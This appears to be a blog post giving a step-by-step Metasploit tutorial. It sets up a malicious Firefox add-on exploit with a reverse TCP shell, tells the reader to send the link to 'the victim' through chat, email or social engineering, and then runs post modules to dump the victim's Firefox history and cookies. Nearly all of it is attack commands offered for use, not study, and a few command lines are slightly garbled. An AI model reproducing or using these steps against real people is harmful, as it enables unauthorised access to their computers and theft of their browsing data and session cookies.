Open Kali terminal type msfconsole
Now type use
exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local
Host)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit
Send
the link of the server to the victim via chat or email or any social
engineering technique. Now you have access to the victims PC
Once
we have the shell, we simply run the post module to dump the credentials to a
file
How to Gather History
Now type use
post/firefox/gather/history
msf exploit (history)
set payload firefox/shell_reverse_tcp
msf exploit (history)>set lhost 192.168.1.9 (IP of Local
Host)
msf exploit (history)>set session 1
msf exploit (history)>exploit
Result
will stored on your local computer
/root/.msf4/loot/
A
look at the result, you will see data like
How to Gather Cookies
Once
we have the shell, we simply run the post module to dump the credentials to a
file
Now type use
post/firefox/gather/cookies
msf exploit (cookies)
set payload firefox/shell_reverse_tcp
msf exploit (cookies)>set lhost 192.168.1.9 (IP of Local
Host)
msf exploit (cookies)>set session 1
msf exploit (cookies)>exploit
Result
will stored on your local computer
/root/.msf4/loot/
0 comments:
Post a Comment